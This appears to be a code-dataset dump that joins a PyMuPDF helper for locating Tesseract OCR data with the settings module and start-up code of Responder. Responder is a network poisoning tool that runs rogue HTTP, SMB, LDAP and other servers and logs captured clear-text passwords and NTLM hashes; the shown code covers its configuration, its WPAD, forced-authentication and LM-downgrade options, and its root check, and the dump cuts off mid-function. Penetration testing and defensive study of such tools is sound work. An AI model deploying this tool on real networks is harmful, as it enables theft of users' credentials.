b'6ZorjEtBWaWBKGVVwvVGqILH6Nz/ArTavZuA9NsbRSKbPjnxjdvwRKyOsCsZxt3IDK4dYc'
b'oQbkVWIJcJp2asYqtETdIcrfcNJ0l8NwdpbaI2A61N1DQdWRkgK9ZmQxBjo1nCVIu/KXjO'
b'SvSayRj3J7tTQuNOcx8ElYsy0W8spSD9rhamqcdgK4X5bnhLoUVcsVUU2WpHCYPKMZrTzw'
b'zt92GKJpByJqdAfnaYQ/L5J6PQQd9qCKGwgsJUChIUJsTdPfGBHTtPZRE6mpsALOg6IGZL'
b'YFVi0n1UKwB5asmgk08IjA4eM2BdbgvSb52x49UH5fL0btWucvxTt3fm3NwxMlVeKDoqXw'
b'plTrcZiU/b8bBq0Xhcre3IGTNCfz1my8hR27EzZoz8OXYALe0H19qOoYKNfDuOH15rO4oK'
b'NnJtOXGyqoCNXFtOGGJrO5AGcOTesWSQre1QGsCRe8uKM6sM2Mi14/iBtrbjqWAj15YjQ2'
b'1tR1TBRq7JsZ2tXezPeIsdoF6pdJUFaBS7VuVlcXWoyRxeOvIFHW9o3gZSXUNfoQfTCyaY'
b'eB3DoXkSA6cfKT9sOEv7GYyhGw3ou0AKMkbXUJiAzv0Dfbi5LATDfHt3tdiQOny02ODg8b'
b'JCbuHRTawTi46Pi881HBsNzhxL3DogNpJnf0X0yjxx4fFo1cIJN178gU5g8WjlI18oNA7d'
b'xRofZ19acLyOkbt8HZs/urQj5cd+ZIVZMiiurJuh2uyZ2bXs0THJmYOPvXfJgVCvjtSMRX'
b'eEmo46QjTXnlZ0PEvJL23ZXxjE7UVZNv06y1UTZ0C0RjeLOFr0RcQJa57ZMheO223ImjaG'
b'9Lm1WczSAWVkxbYCKQM/RydfMMs6aqPBAqlx5wzYqBZChYaGHIjmaYgoOj+A0ovOC2g6yn'
b'NUI4giJwQgnOj48KOVreWCtNewUhL6Cg1y9bVEqaFH9xIxyOsTopOA+u16BekteAXf2kKc'
b'3mD7rcRbPL2lCL7edoX4Z3/KdoZoQ9bPPKH7N/iOzh8gW6PzB5qO8h+hIRij+yjNLbNonL'
b'xVTrTnq90l+2Y53InIrw93NskoTycB0TfuBfRWjubJdzP0BkvnZ55wqbLCj1bY6+QkCnvj'
b'vrXOWBYAN0GnMqSrcvS7iZWzZk5svJbUMOTNaC2pWQDU+nlt6KCfk9Z3dDBqfQmHpiOrHs'
b'YGfRn/b4cLYnzbdq9rA+3DyX4Kuu+ejZaTuu+wnBIjQfXzeNAOiGBK5Btsnlna22RMHb/f'
b'8/+dXCmC6h/wS3hmLbfw3gfnaE9ODCmBW7Lv9enM0mHeS2Fp7cRB3oUVRc592hRcuk57qT'
b'3oPVUO0I485t1YUWRfxIUh9Cw56VkPSD/rKVP3HVVFBK+mQitQ29c1LVNm9lNf3OmgG2Zz'
b'y8ay/PO6qAhhSpVZQu6Yg5Z1iuZYGcWMpEoN7YcK6DpCRs7grUP13u30SIUm0D0Mdt8sd9'
b'+jx9nmib+bccL9tFPXqaetckOPmmBmwKs2aN2OGyHK3j9iUdrPNNfEoyKyB0WEebYDxgtE'
b'Dr5aH3K43j3PkhuPVtBdtBu8JKD6A5RjdK2WpqP+oAVj3z8MO7v41AQyrD4pMFosUrhsmU'
b'4N9nXoURs5TjgBZosbeDS2oMp2+m7NLEtGpjEspK/mgnU2MH6GTWUHqHF6aZFggFdq4NYZ'
b'lYl14Ed1F4B6QLO1iB7jlx4KhnYOik3tKg8G+zoH3bKwc6JqQw/nOsp/h2lzOgeJQd3c0W'
b'JS1wrgjeqcFzGjc5HrHTjnJD7EMgmgnGKZKkyOsdQOdIZ4COzxLHflQ3E7baNVs4qAGoVL'
b'0vrCtpoAbwSSa/NSh+jnkVaLMoLDnXqrBUvScPSzSPAw0bC+hK9wTyJZtr60D74yDUfRrB'
b'K538I64ikMo6TlltzZFUlef2Fo9kCXvXJvlQmTBVodcEDQBwyww1R+px4RMbHoUQRj2/Yh'
b'zkx0vduo25xaYNRvlha96jgri497ThaRvtKOgvDYoD0yaL+dmB4x6xLNxH5CVE1pIss00S'
b'kidI8OGPe6Dr7qdR0ed7EEo6xiH7rlzceSKlbd3pxvmJmvoCJpOihIGjVfwxlwtriGxU/M'
b'FC/LKzT4cLwh1INFaqCgl1lBlAhzDYSgHCzOGkUHV0StvlCj1vZP5jFRqtT8pCnKwsGmTi'
b'l6dzmsz91ooYU8PZKhhukJeaPpaCRDTvW7i3o7ZmmB6MCzAfe9tc+hijHKKcY+nK6WdKYW'
b'Hq3oWHRkPdI6MF7lKZNblh/zJDb6KAwdHyilxt6zz48WZmx4o/tLl8ktcxEmkqc82Ef0f4'
b'YhyZBqwDTuwnBZBPKWvfqKbD9UGq96WHRAGBQNEA+JpYXCgGiAW8OhEUUPhsZlNBQaRA+E'
b'BpBhcGYoGQSXjvRDoHEsA6CJTg9/hh0/MbwS6HLkfsDbBuPwHvU7NnefeWcyQuaCyPhYGc'
b'iNjojL2XBnK/sZ7TQRs4c3K/epFekZ6oq+bhz1K1p4QeTcDT6pVrIwWDwec0d19O4eyi+6'
b'E5KudKvUdNQqIeWw6zcXI6uxtV6/OQW/9ixjzh7zkCdcdBKTZGQk2l+4GIt+T35WNmlIhX'
b'UhJNudC80m9lPXPAduzE6w+4yeWVOYPLM2TU6y1IQWbnRSPVlpHPbwwAswpp7a89zs0lF+'
b'08vcyw394mHL1w4x2M9nzkV4HslzfEjPTzQSXHnKhNsK9bB+6eGJUXtwd6BxVOqpgf6XmS'
b'P3JjTvFDWGzMKTJvCFp5zs3E70oYXzCddJKZ2bcIHRYLYDzWqjd1RpR3ZJ1rqiB++odo68'
b'+bHHvZymbF5RQ8zcw5Ueb7Q4HYN1GMolWtKpSHu1yhBarTIAn6TQPTqHbaLxkjPXCYjGj1'
b'XUE4uO1+0zC8c9e+mCGNkP5haNR4bSgqO+nU1IrwMiGnsqgs+RMyccFd1BhlI0ZziuG2Tp'
b'ODfaI0RVFmH2Wx38recOCwdz2UmHQ7YcxS4PW6rVNEwjpbsTZHH0pqymo+5kmcSvhxYUht'
b'q9tURLkbgLLyPh0B4ZrHlKC90IqsRGHQg2ZUsE8zZcXtfRvU6LhLbNUAr04dw5yYdneyQj'
b'c5Q1VeB7UHJqNyNH2/JaOpjyklbbvhXJ0fvcGbGr17nz5BytCa5IjzTzBUPvmaYoRcvkHC'
b'0frhQdnUmegHF+7bqdvuf8vOZBZxP0V6qXc34Y5ZRab6C2IzJoxgYM+ilIe1kn5s1nbZUP'
b'hiyDFfjG6Mu3DdBXnMPqV4mMeNDPW6IqGiBe30eVNOjYQp7F+3D1OGTDPLLw1Wl7eDEXjy'
b'bnsFiWWyK+q6VKgUZWCZRVnX+CLnCOVsYaQ8sCGmTQBw6mqAjdrccG5nSoLimfkxw941AS'
b'u3Hp6zzzjPHFAZMFOVcPP1QGDQfcTcC3bjjAAOI5V0E3ZO35cO9ZvSs8U+hI/KlhxbV7Vl'
b'vwRtRT4VxF3ZJ1fRtChaKJ7sUpFR01CjrcdS9bngvNeGZNSK9TmDh2PSft3WbQd7BNPOOP'
b'jksHgcGkK4XTkLeUY8MQRXdpKFEtKUpY2aFTqpZ8KO1sXx1lhp3DhXOKDBfOGTBcOGfIk6'
b'6GDZpi97UPM+pZY4Fo6kUwOuJQkPa9oiF0t+iA0C8aIPQ7+cTQI/uXBUEuNT1jpBndwViP'
b'eNFFjJVm+tX+KLSrKxlRH3QvkzWGHlXTuQGv2ox1O66+jA99Qfdnfzqb+zdyCzzyMGLGd+'
b'VA2ieCavtpTnqk9ntkxE/U7KxfzWZnwhlNaIUxnr42yXiX3uSNgUYzU+P0GM+WFoLJPGgS'
b'IKmtTB60SqOvhLs2UybEHQ9Z8vPFnCYRdkaMVmOTVZtYb+r8SOUgASYWGMKBktoi6ogJS9'
b'Ye2tF302eCnsx7cpzrhens4gY3TDENGyXDeXhuP4NXB6i5+MwiIQczDdyaj7vw/YzcBaAW'
b'r50DPUufeSjM0x0Uz9RzD4a5uoNudUhOVD1fd66jGbvDbh0SLy1LT+eda+nnnJMwpZ8L4C'
b'f1zotb7TNHUdoY4t2aJ7NB7RjSU7o06MPkLjg/Tyeprr9E1Y3u5kKdje7m0nQ0dhgGmtFV'
b'I514xqiNenzcRLNkPDmoHDJqoHQoz7yFR7Wcoj+xkLNdyR01RORmuNzvnJPSeeARERajXV'
b'azUDSDmFrQz+Yciozv9506PEShedIxDBulQ+LBxKAv0YtmlERd/eBOlFDm6FrxCsqtNmAp'
b'QUerJJBUvwfNNhFdVYX+IrqqStNR2TIgxIPs//NMc9qnrbUca4uIIXdGs0FaXLktPRac1R'
b'7a9xsHVQZ67M29Ms3SUGbZjxNVEnw8GB2o8WrutbDShd01hkAzRn+/8ATZwmlgj45m22GC'
b'fUSf0Jkb5GiePf0uV7YCl991ok8Uz266sqZMOR+I/i5bImq/70bHhC4CqrWMGwjZHWv3o0'
b'uTnGWRB6mn/ZA1803ZqXnSW+zOFeRNdhGC3Efo18SR5cd+/bRBsHziwRC7R16aPrXEkTtA'
b'zdwSPMRPa1jagPLZWr4013NO5D7DRCoCwlTKwWEyRSCaNBjAGHZSceNnmmlCc7J7RYRVdA'
b'eMN1gcfLXB4vB4g4XgNrrIDrmnVzPQcvUEe7Yi7W/BMIS+lccB4coOAvoE9czQ8RyQ88vr'
b'KU3DJn41u2jYEcQa7MQAXoW1lNZhPRKUWCLeOKtG5NHNYKgP0c1gmo46FlSPy/g2D47Sl/'
b'F1HosrMDoZjSx67XZflZ7ROEQGWu8kaGm5Q2SwNH4O57ewNZw7RDSGIp9OHSYaYOUBCZkB'
b'8WauPONH0D8MqbSjmnSQOQ3kLc3IhOr1IuN1dLNO4bDvIboPmZCjdajaAkGDMkCsP2UWCt'
b'qTAW7pTiYpWnMyLiO9ySC3tCYjtNaZjEspSMMO+tLMkV5bMo6lSI0c8m5OY7JQK0PGtVeF'
b'HNEfN0bRnCa8RhnxXeR2tXlyMes5GaK9KLM/UuqylxqkuxqtXCYXubwMIYaFFUeEy8saDc'
b'hKS5VEz4HmyWWzDt1HkYIOt41VlpSzIZDd2yFCRH3b2CKQ3jMmxIJJ9HnAJBlzhQXRVmmA'
b'nQDpUkUjdxItS4DqpjAIKTeUQUptJmnI8C4xSH3tD8LR14lBd7i4C8qaif30V860M0uraC'
b'muvqCsbSwdhbi0mFxQtgIdX1DGHNeQzhDk3ZUdMmTUtxSVye3lYXjVt1Ogz7+EO8yQqZKZ'
b'6Ogu148YrzyoluQq43J08xOkj1RGlAVX4PytQcVK0eYS7QlTIJD2m2u3uqvJFe4vJ6Jb9x'
b'TxnJ/s7cyy9QQlJxdaMRt8u2eRvsgLPCTQiqMtbzQonsg2158tCk/ox4ebMeh1SBO44fgL'
b'HzAPc4jcn4bK8DI2xPeYO0kBEaL8ZQKsdT0v37+Mn8qGwnc1/E2L5Gr0m4+xaPBD3UAPtz'
b'ZW8GrldBXgq1czG5S7f5KY/qP7rCoPSCeA6HVvh6yRboXfusVaOjRZ0le1LgN4y+45wr3F'
b'cwRqW2cwbgWSJtdhaEwHkSZf2cWXyVfZSyvwrbfSLB0MlEjrW4or0NwsWJIRtgdyRZbFCA'
b'hLkgYMS5KWNKe4oAE3QgWt2GDaz2pC5G0IL7uhZ/sahhkEqXo9qEHRS88YW78q3XI+JTlS'
b'LRtiV5rlguhYsVwC1JkzA23ejeDuiu8TzAg6qRYCcBKrngabLCOOPo8yizjhjaI4LAfWAK'
b'Pbb9vkq5/LIE16WWMFt2iC+uEkNHcL+TrkaV1/iJ3WR31XPObpDvNNRADdTgBGHS+qoJ6r'
b'VxDImJjefGe8HTN1UjxTG602yf9isEoPOoB58lU6XVQlP/hVSGxQ+ZHjeiyeoeLogW01TV'
b'5ZyFXy6rsVJPl1re4snYHUhzdWoPXhDU1H8i7IkGBqUOM+tG49qAMkeFZ2uAWF+2ou1uME'
b'ncF+fbs9hCE169ewU8g4R89ImtBfw0uUYTV9GjNib3WZvKpnhpbJa2i5pSXETB3d8Ksaz2'
b'uSaosN85BX1dKhO73q3axZChq+OSbwFuo0RSqixkoHIV+Rnk7dmwrJvKZUwyFNFvTFkAaQ'
b'Rwox0CrAzWWAL2cOh07VHeOFmEn7HZ4qB2i/1278Cstk9T2mDmFqHaHb2huT/GJRRYi7NJ'
b'zn4LjlZSqRclw7x8PrwV+kY5yEk3g8kn7lRrOXls2kfS+IRX7tRrNTz+b94ryja7SmVX6H'
b'L4tRLs2G/m46Zjccab4LxPjzb+PxRl2H9jTYCAZcFhVnLgmnMw0Yy4mTWG0/lr48/7fFu/'
b'r7TiStLhnQF7+X0GLsQjNRFHpBfDYBrVuNoaWZQOaoW0ce6SXXWQZa+9Z0pNQhQwbzMMmM'
b'H5HdC1noSf1GUIY4pL9GeEbfTLmF/KrPysFV6L1RB98OZqK0Sjj3xHDzpxqB82Xypza3zp'
b'JgT4lZ1p+6F4LTqBdqkj+jEx3QCf7kBUpNm0SWjui4xawRmfynkrXNEz4EBD30bb3ehA57'
b'2ib6tnRouG8yM18mcnF6Rlz1ZFkSXaNuvOmlLNJ68JiC1uOGpqOByDAkmhTUfs3h1e+6Ut'
b'yroSn3oI7iCozqwgJcrdqXcB7Ko7ZEGCaq5E3P9JG8qIAsLdPgInlTCuB0TtLcCB+GsGUW'
b'wFg3ZF6Od4pXxvWtkbCMGaORcB5zxzvNqFgRf7TlDIXk7Xp7GlPwt6vdaegmb7eNKzD+vn'
b'3HuALV9e2WccXMBGa3LIezXTcJGYc6oSoi029MU5nncZsmokZbQ16dDq8ZwHG9RRN4Q9sM'
b'JhbzCI8fxjI8fXHZlBl5vLmCgwYHKDYETAUbH7VnVXasGGcFOPdhijKDDF55YIm4bYpmaj'
b'/9agumUm+91oGRC1rwgvxgdIhY+sMb+mmMFWzD8eYYhYi6G6RtMA9mm48wT1NkmJYZMEzL'
b'DBlNsTKH6PsyVk0KMaID4ag0QxC5Zji62deKjnqWkgypDSiwqzuvoe29XV163V6BUT+C/s'
b'g8VmLPJ6AgBt1PGmFVh2ZieJNttIxJfgtv72KWJkvgLMmX4alDIe9ZAryXaR5D+oJRlCtt'
b'4uZIpR+skDN6sIIoftrBShkGLiQhOvGNIC4qg9EJRAfAS0VHGVyQIVVpAup03z/pPrZxWD'
b'+c+8c+ejQDQxp4u/4MPUTDVYBv+ZqRPS7GwoNa7CswKkbGrroVdowX3XuwJ9Xj5HJF2i8Y'
b'r5JvHFvnyTd9WA36xjdZRCbPO2/wrS8cIK2MOmuSI6NOBnVt1FkZNBh1Gldjo04G16szXJ'
b'mhR0e4JgC1jSdD+qN7xIRbHVhFCRs0visQvfW39fEPtSnPGN/M2adlaT9D1xABoXNwcOge'
b'AGhtCSn1S+VVi28ZqWeWcCM1an0KwBp+8tO+sV4tzJcYVjraj9ezPPkWLeAgtpuWk2hS37'
b'pbJ6NRAaITtgg/OmFL+mh2rybmK2z/WFrtX5UG8FtSltJ7Sh4Jm0oWiXeVbLB6s8gi0W6R'
b'hfSukEXUzo8F9HkXi/jtHUuZZvT7wLfOqAusAngYDg7PJpNFwK0MwFD3ndEakhGdR0ShbD'
b'vdnOYEzKK/vko+I6oLj+HcLr3KcG4U3zL5Fh0rQwWOjpWRPgzqPnBUQW0lwoYRDYwQNToR'
b'A/fRiRjQ0s/D79gsABOib2GDDQmK7OEReGQPP0/+7a59v0z+H+SUGTTsMAEA'
)).decode().splitlines()
def get_tessdata() -> str:
    """Detect Tesseract-OCR and return its language support folder.

    This function can be used to enable OCR via Tesseract even if the
    environment variable TESSDATA_PREFIX has not been set.

    Returns:
        Folder name of tessdata if Tesseract-OCR is available, otherwise False.
    """
    import pathlib  # local import: only needed for the Unix discovery path

    # An explicitly configured environment wins (even an empty string, as before).
    TESSDATA_PREFIX = os.getenv("TESSDATA_PREFIX")
    if TESSDATA_PREFIX is not None:
        return TESSDATA_PREFIX

    # Check the well-known default installation location first.
    if sys.platform == "win32":
        tessdata = "C:\\Program Files\\Tesseract-OCR\\tessdata"
    else:
        tessdata = "/usr/share/tesseract-ocr/4.00/tessdata"
    if os.path.exists(tessdata):
        return tessdata

    # Default location missing: try to locate the tesseract-ocr installation.
    if sys.platform == "win32":
        # Windows: ask 'where' for the tesseract executable.
        try:
            response = os.popen("where tesseract").read().strip()
        except OSError:
            response = ""
        if not response:
            print("Tesseract-OCR is not installed")
            return False
        dirname = os.path.dirname(response)  # path of tesseract.exe
        tessdata = os.path.join(dirname, "tessdata")  # language support
        if os.path.exists(tessdata):  # all ok?
            return tessdata
        # should not happen!
        print("unexpected: Tesseract-OCR has no 'tessdata' folder", file=sys.stderr)
        return False

    # Unix-like systems: 'whereis' yields "tesseract-ocr: <install-folder>".
    try:
        response = os.popen("whereis tesseract-ocr").read().strip().split()
    except OSError:
        response = []
    if len(response) != 2:  # if not 2 tokens: no tesseract-ocr
        print("Tesseract-OCR is not installed")
        return False

    # Determine tessdata by iterating over subfolders of the install folder.
    # (The original code called .iterdir() on the token *list*, which raised
    # AttributeError; wrap the path string in pathlib.Path instead.)
    tessdata = None
    for sub_response in pathlib.Path(response[1]).iterdir():
        if not sub_response.is_dir():  # skip plain files
            continue
        for sub_sub in sub_response.iterdir():
            if str(sub_sub).endswith("tessdata"):
                tessdata = sub_sub
                break
    if tessdata is not None:
        return tessdata
    print(
        "unexpected: tesseract-ocr has no 'tessdata' folder",
        file=sys.stderr,
    )
    return False
%}
| 81,757 | Python | .pyt | 1,973 | 35.428789 | 139 | 0.692846 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,385 | settings.py | SpiderLabs_Responder/settings.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import utils
import ConfigParser
from utils import *
__version__ = 'Responder 2.3'
class Settings:
def __init__(self):
self.ResponderPATH = os.path.dirname(__file__)
self.Bind_To = '0.0.0.0'
def __str__(self):
ret = 'Settings class:\n'
for attr in dir(self):
value = str(getattr(self, attr)).strip()
ret += " Settings.%s = %s\n" % (attr, value)
return ret
def toBool(self, str):
return str.upper() == 'ON'
def ExpandIPRanges(self):
def expand_ranges(lst):
ret = []
for l in lst:
tab = l.split('.')
x = {}
i = 0
for byte in tab:
if '-' not in byte:
x[i] = x[i+1] = int(byte)
else:
b = byte.split('-')
x[i] = int(b[0])
x[i+1] = int(b[1])
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
ret.append('%d.%d.%d.%d' % (a, b, c, d))
return ret
self.RespondTo = expand_ranges(self.RespondTo)
self.DontRespondTo = expand_ranges(self.DontRespondTo)
def populate(self, options):
if options.Interface is None and utils.IsOsX() is False:
print utils.color("Error: -I <if> mandatory option is missing", 1)
sys.exit(-1)
# Config parsing
config = ConfigParser.ConfigParser()
config.read(os.path.join(self.ResponderPATH, 'Responder.conf'))
# Servers
self.HTTP_On_Off = self.toBool(config.get('Responder Core', 'HTTP'))
self.SSL_On_Off = self.toBool(config.get('Responder Core', 'HTTPS'))
self.SMB_On_Off = self.toBool(config.get('Responder Core', 'SMB'))
self.SQL_On_Off = self.toBool(config.get('Responder Core', 'SQL'))
self.FTP_On_Off = self.toBool(config.get('Responder Core', 'FTP'))
self.POP_On_Off = self.toBool(config.get('Responder Core', 'POP'))
self.IMAP_On_Off = self.toBool(config.get('Responder Core', 'IMAP'))
self.SMTP_On_Off = self.toBool(config.get('Responder Core', 'SMTP'))
self.LDAP_On_Off = self.toBool(config.get('Responder Core', 'LDAP'))
self.DNS_On_Off = self.toBool(config.get('Responder Core', 'DNS'))
self.Krb_On_Off = self.toBool(config.get('Responder Core', 'Kerberos'))
# Db File
self.DatabaseFile = os.path.join(self.ResponderPATH, config.get('Responder Core', 'Database'))
# Log Files
self.LogDir = os.path.join(self.ResponderPATH, 'logs')
if not os.path.exists(self.LogDir):
os.mkdir(self.LogDir)
self.SessionLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'SessionLog'))
self.PoisonersLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'PoisonersLog'))
self.AnalyzeLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'AnalyzeLog'))
self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv2Log = os.path.join(self.LogDir, 'HTTP-NTLMv2-Client-%s.txt')
self.KerberosLog = os.path.join(self.LogDir, 'MSKerberos-Client-%s.txt')
self.MSSQLNTLMv1Log = os.path.join(self.LogDir, 'MSSQL-NTLMv1-Client-%s.txt')
self.MSSQLNTLMv2Log = os.path.join(self.LogDir, 'MSSQL-NTLMv2-Client-%s.txt')
self.SMBNTLMv1Log = os.path.join(self.LogDir, 'SMB-NTLMv1-Client-%s.txt')
self.SMBNTLMv2Log = os.path.join(self.LogDir, 'SMB-NTLMv2-Client-%s.txt')
self.SMBNTLMSSPv1Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv1-Client-%s.txt')
self.SMBNTLMSSPv2Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv2-Client-%s.txt')
# HTTP Options
self.Serve_Exe = self.toBool(config.get('HTTP Server', 'Serve-Exe'))
self.Serve_Always = self.toBool(config.get('HTTP Server', 'Serve-Always'))
self.Serve_Html = self.toBool(config.get('HTTP Server', 'Serve-Html'))
self.Html_Filename = config.get('HTTP Server', 'HtmlFilename')
self.Exe_Filename = config.get('HTTP Server', 'ExeFilename')
self.Exe_DlName = config.get('HTTP Server', 'ExeDownloadName')
self.WPAD_Script = config.get('HTTP Server', 'WPADScript')
self.HtmlToInject = config.get('HTTP Server', 'HtmlToInject')
if not os.path.exists(self.Html_Filename):
print utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1)
if not os.path.exists(self.Exe_Filename):
print utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1)
# SSL Options
self.SSLKey = config.get('HTTPS Server', 'SSLKey')
self.SSLCert = config.get('HTTPS Server', 'SSLCert')
# Respond to hosts
self.RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
self.RespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')])
self.DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])
# Auto Ignore List
self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess'))
self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials'))
self.AutoIgnoreList = []
# CLI options
self.LM_On_Off = options.LM_On_Off
self.WPAD_On_Off = options.WPAD_On_Off
self.Wredirect = options.Wredirect
self.NBTNSDomain = options.NBTNSDomain
self.Basic = options.Basic
self.Finger_On_Off = options.Finger
self.Interface = options.Interface
self.OURIP = options.OURIP
self.Force_WPAD_Auth = options.Force_WPAD_Auth
self.Upstream_Proxy = options.Upstream_Proxy
self.AnalyzeMode = options.Analyze
self.Verbose = options.Verbose
self.CommandLine = str(sys.argv)
if self.HtmlToInject is None:
self.HtmlToInject = ''
self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP)
self.IP_aton = socket.inet_aton(self.Bind_To)
self.Os_version = sys.platform
# Set up Challenge
self.NumChal = config.get('Responder Core', 'Challenge')
if len(self.NumChal) is not 16:
print utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)
sys.exit(-1)
self.Challenge = ""
for i in range(0, len(self.NumChal),2):
self.Challenge += self.NumChal[i:i+2].decode("hex")
# Set up logging
logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logging.warning('Responder Started: %s' % self.CommandLine)
logging.warning('Responder Config: %s' % str(self))
Formatter = logging.Formatter('%(asctime)s - %(message)s')
PLog_Handler = logging.FileHandler(self.PoisonersLogFile, 'w')
ALog_Handler = logging.FileHandler(self.AnalyzeLogFile, 'a')
PLog_Handler.setLevel(logging.INFO)
ALog_Handler.setLevel(logging.INFO)
PLog_Handler.setFormatter(Formatter)
ALog_Handler.setFormatter(Formatter)
self.PoisonersLogger = logging.getLogger('Poisoners Log')
self.PoisonersLogger.addHandler(PLog_Handler)
self.AnalyzeLogger = logging.getLogger('Analyze Log')
self.AnalyzeLogger.addHandler(ALog_Handler)
def init():
	"""Create the module-level Config singleton (accessed as ``settings.Config``)."""
	global Config
	Config = Settings()
| 8,817 | Python | .py | 171 | 48.245614 | 139 | 0.691682 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,386 | Responder.py | SpiderLabs_Responder/Responder.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import optparse
import ssl
from SocketServer import TCPServer, UDPServer, ThreadingMixIn
from threading import Thread
from utils import *
# --- Command-line parsing and start-up (module level: runs on import) ---
banner()

parser = optparse.OptionParser(usage='python %prog -I eth0 -w -r -f\nor:\npython %prog -I eth0 -wrf', version=settings.__version__, prog=sys.argv[0])
parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False)
parser.add_option('-I','--interface', action="store", help="Network interface to use", dest="Interface", metavar="eth0", default=None)
parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None)
parser.add_option('-b', '--basic', action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False)
parser.add_option('-r', '--wredir', action="store_true", help="Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network. Default: False", dest="Wredirect", default=False)
parser.add_option('-d', '--NBTNSdomain', action="store_true", help="Enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network. Default: False", dest="NBTNSDomain", default=False)
parser.add_option('-f','--fingerprint', action="store_true", help="This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", dest="Finger", default=False)
parser.add_option('-w','--wpad', action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False)
parser.add_option('-u','--upstream-proxy', action="store", help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None)
parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False)
parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False)
parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose")

options, args = parser.parse_args()

# Raw socket binding and poisoning require root; on OSX the local IP (-i)
# must be supplied because interface binding is not supported there.
if not os.geteuid() == 0:
	print color("[!] Responder must be run as root.")
	sys.exit(-1)
elif options.OURIP is None and IsOsX() is True:
	print "\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n"
	parser.print_help()
	exit(-1)

# Build the global Config from Responder.conf + CLI options, then expand
# any dashed IP ranges into concrete addresses.
settings.init()
settings.Config.populate(options)

StartupMessage()

settings.Config.ExpandIPRanges()

if settings.Config.AnalyzeMode:
	print color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
	"""UDP server handling each request in its own thread.

	On supported OSes the socket is pinned to the configured interface via
	socket option 25 (SO_BINDTODEVICE on Linux).
	"""
	def server_bind(self):
		if OsInterfaceIsSupported():
			try:
